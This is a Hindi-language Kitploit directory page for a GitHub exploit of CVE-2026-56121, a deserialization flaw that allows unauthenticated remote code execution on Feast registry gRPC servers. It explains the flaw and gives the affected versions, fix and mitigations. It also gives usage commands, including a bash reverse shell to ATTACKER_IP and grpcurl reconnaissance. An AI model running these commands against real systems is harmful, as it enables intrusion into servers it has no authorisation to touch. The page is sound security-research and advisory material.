Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-56121_exploit — अप्रमाणित RCE शोषण Feast रजिस्ट्री gRPC सर्वर (CVE-2026-56121) के लिए dill डीसीरियलाइज़ेशन का उपयोग करते हुए। इसमें पेलोड निर्माण, रिवर्स शेल समर्थन, और gRPC रिफ्लेक्शन के माध्यम से लक्ष्य पहचान शामिल है। | Kitploit
उपकरण/GitHubGitHub/0xdak/cve-2026-56121_exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHub0xdak/cve-2026-56121_exploit

CVE-2026-56121_exploit

अप्रमाणित RCE शोषण Feast रजिस्ट्री gRPC सर्वर (CVE-2026-56121) के लिए dill डीसीरियलाइज़ेशन का उपयोग करते हुए। इसमें पेलोड निर्माण, रिवर्स शेल समर्थन, और gRPC रिफ्लेक्शन के माध्यम से लक्ष्य पहचान शामिल है।

रिपॉजिटरी देखें
128 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-56121 — Feast रजिस्ट्री अप्रमाणित दूरस्थ कोड निष्पादन (dill.loads)

Feast फीचर स्टोर के रजिस्ट्री gRPC सर्वर में अप्रमाणित दूरस्थ कोड निष्पादन।

ApplyFeatureView RPC अनुरोध प्रोटो से OnDemandFeatureView का पुनर्निर्माण करता है। ऐसा करते समय यह spec.user_defined_function.body को base64-डिकोड करता है और उसे dill.loads() में पास करता है — किसी भी प्राधिकरण जाँच से पहले। dill, pickle का एक सुपरसेट है, इसलिए एक ऐसी वस्तु जिसका __reduce__ (os.system, (cmd,)) लौटाता है, जैसे ही सर्वर उसे डिसीरियलाइज़ करता है, एक मनमाना कमांड निष्पादित करती है। डिफ़ॉल्ट डिप्लॉयमेंट auth: no_auth भेजता है, इसलिए रजिस्ट्री पोर्ट पर एक अप्रमाणित gRPC अनुरोध ही पर्याप्त है।

  • प्रभावित: Feast < 0.63.0
  • समाधान: Feast 0.63.0 में
  • डिफ़ॉल्ट पोर्ट: 6570 (रजिस्ट्री gRPC)
  • CWE: 502 (अविश्वसनीय डेटा का डिसीरियलाइज़ेशन)
  • प्रभाव: रजिस्ट्री सेवा उपयोगकर्ता के रूप में दूरस्थ कोड निष्पादन (अक्सर पूरा फीचर-स्टोर नियंत्रण तल)

आवश्यकताएँ

शोषण Feast के स्वयं के जनरेटेड gRPC प्रोटो का पुन: उपयोग करता है, इसलिए आक्रमणकारी के पक्ष में एक अवरोधन योग्य Feast स्थापित करें:

root@kitploit:~
python3 -m venv venv && . venv/bin/activate
pip install "feast==0.62.0" grpcio

उपयोग

root@kitploit:~
# त्वरित जाँच (आउटपुट सर्वर पर दिखाई देता है, स्थानीय रूप से नहीं)
python3 exploit.py 10.10.10.10:6570 -c "id"

# रिवर्स शेल (bash -c रैपर: os.system /bin/sh का उपयोग करता है, जिसमें /dev/tcp नहीं है)
python3 exploit.py 10.10.10.10:6570 -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"'

-p/--project प्रोजेक्ट नाम सेट करता है (डिफ़ॉल्ट feature_repo)। कमांड आउटपुट रजिस्ट्री होस्ट के stdout/journal पर मुद्रित होता है, इसलिए परिणाम देखने के लिए रिवर्स शेल का उपयोग करें या पढ़ने योग्य पथ पर लिखें।

लक्ष्य की पहचान

रजिस्ट्री में gRPC रिफ्लेक्शन सक्षम है:

root@kitploit:~
grpcurl -plaintext 10.10.10.10:6570 list
# feast.registry.RegistryServer
# grpc.health.v1.Health
# grpc.reflection.v1alpha.ServerReflection

निवारण

Feast 0.63.0+ पर अपग्रेड करें, एक प्रमाणीकरण बैकएंड सक्षम करें, और रजिस्ट्री gRPC पोर्ट को अविश्वसनीय नेटवर्कों पर कभी एक्सपोज़ न करें।

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसका उपयोग केवल उन प्रणालियों पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।

टूल डाउनलोड करें